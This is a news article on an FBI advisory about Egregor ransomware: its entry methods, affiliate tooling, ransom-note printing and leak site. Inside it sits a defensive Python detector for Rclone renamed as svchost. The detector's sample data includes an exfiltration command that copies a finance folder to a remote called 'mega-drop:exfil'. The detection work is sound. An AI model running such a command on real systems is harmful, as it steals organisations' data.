The FBI has alerted US companies in the private sector to many attacks using the Egregor ransomware. The malware is currently attacking businesses worldwide and has already compromised over 150 organisations.
The agency stated that the malware has compromised more than 150 organisations and provided more insight into its ransomware-as-a-service behaviour.
It issued an advisory (PDF) that sheds new light on the inner workings of the prolific malware, which has already been seen wreaking indiscriminate havoc against various types of organisations.
Egregor — the name of which refers to an occult term meant to signify the collective energy or force of a group of individuals — is indeed the work of a “large number of actors” and operates on a ransomware-as-a-service model, according to the FBI.
“Because of the large number of actors involved in deploying Egregor, the tactics, techniques and procedures (TTPs) used in its deployment can vary widely, creating significant challenges for defence and mitigation,” explained the FBI.
The FBI observed the “number of ways” Egregor compromises business networks, “including targeting…employee personal accounts that share access with business networks or devices.”
It also spreads via phishing emails with malicious attachments or exploits for remote desktop protocol (RDP) or VPNs, the agency said.
Once access is gained, threat actors can move laterally inside networks. Egregor ransomware affiliates have been seen using common pen-testing and exploit tools such as Cobalt Strike, Qakbot/Qbot, Advanced IP Scanner and AdFind to escalate privileges and move laterally across a network, as well as tools such as Rclone (sometimes renamed or hidden as “svchost”) and 7zip to exfiltrate data, according to the FBI.
Corroborating what security researchers have already observed, the FBI revealed it first identified Egregor in September and noted that since then, the threat actors behind the malware have worked quickly.
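The renamed-Rclone exfiltration tradecraft above is one of the more checkable details in the advisory. The following is an added example, not code from the article or the FBI document: it scores process-creation events (a subset of Sysmon Event ID 1 fields, with constructed sample events) for an `svchost.exe` that runs outside the Windows system directories, carries Rclone's original file name, or uses an Rclone-style command line. The command-line pattern is a heuristic assumption, not an indicator from the advisory.

```python
# Added example (not from the FBI advisory or the article): flag process-creation
# events consistent with Rclone masquerading as svchost for data exfiltration.
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields."""
    image: str              # full path of the executable that started
    original_file_name: str # OriginalFileName from the PE version resource
    command_line: str

# Heuristic (assumption): an rclone subcommand followed by a remote spec such as
# "backup-s3:bucket" (remote names of 2+ chars, so plain drive letters like C: are
# excluded), or flags typical of rclone usage.
RCLONE_HINTS = re.compile(
    r"\b(copy|sync|move|lsd)\b.*(?<!\S)[A-Za-z0-9_-]{2,}:|--config\b|--transfers\b",
    re.IGNORECASE,
)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def check_event(ev: ProcEvent) -> list:
    """Return the list of reasons this event looks like renamed Rclone (empty if none)."""
    reasons = []
    img = ev.image.lower().replace("/", "\\")
    name = img.rsplit("\\", 1)[-1]
    if name == "svchost.exe" and not img.startswith(SYSTEM_DIRS):
        reasons.append("svchost.exe outside System32/SysWOW64")
    if ev.original_file_name.lower() == "rclone.exe" and name != "rclone.exe":
        reasons.append("OriginalFileName is rclone.exe but the image was renamed")
    if RCLONE_HINTS.search(ev.command_line):
        reasons.append("rclone-style command line")
    return reasons

def scan(events):
    """Pair each event that raised at least one reason with its reasons, for triage."""
    return [(e.image, check_event(e)) for e in events if check_event(e)]

# Constructed sample events: a legitimate svchost, a masquerading rclone, and an
# un-renamed rclone run (still surfaced, since sanctioned use should be reviewed).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    ProcEvent(r"C:\Users\Public\svchost.exe", "rclone.exe",
              r"svchost.exe copy C:\Finance mega-drop:exfil --config C:\Users\Public\r.conf --transfers 8"),
    ProcEvent(r"C:\Tools\rclone.exe", "rclone.exe",
              r"rclone.exe sync C:\backup backup-s3:bucket"),
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

In a real deployment the same three checks map naturally onto a SIEM query over Sysmon or EDR process telemetry; the renamed-binary check is the cheapest and least noisy of the three.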
The document also describes what the typical modus operandi of Egregor looks like to victims, behaviour already observed in known and publicised attacks. In addition to engaging in typical ransomware behaviours, such as exfiltrating and encrypting files on the network and leaving a ransom note on machines instructing victims how to communicate with the threat actors via an online chat, Egregor also has a unique feature, the FBI observed.
“Egregor actors often utilise the print function on victim machines to print ransom notes,” the agency wrote in the document.
Indeed, the group is at this time the only known ransomware operation to run scripts that cause printers at the organisation to continuously print out the ransom note, a behaviour captured on video and posted to Twitter during an attack on South American retailer Cencosud in mid-November.
Will Not Pay
If victims refuse to pay, Egregor publishes victim data to a “public site,” the FBI noted.
However, the agency, like many security experts, encourages organisations not to pay the ransom, as doing so “emboldens adversaries to target additional organisations, encourages other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities,” the FBI explained.
Paying the ransom also does not guarantee that a victim’s files will be recovered, another well-known outcome of ransomware attacks, the FBI commented.
“However, the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees and customers,” the agency said, encouraging organisations to report ransomware incidents to their local FBI field offices whether or not they decide to pay the ransom.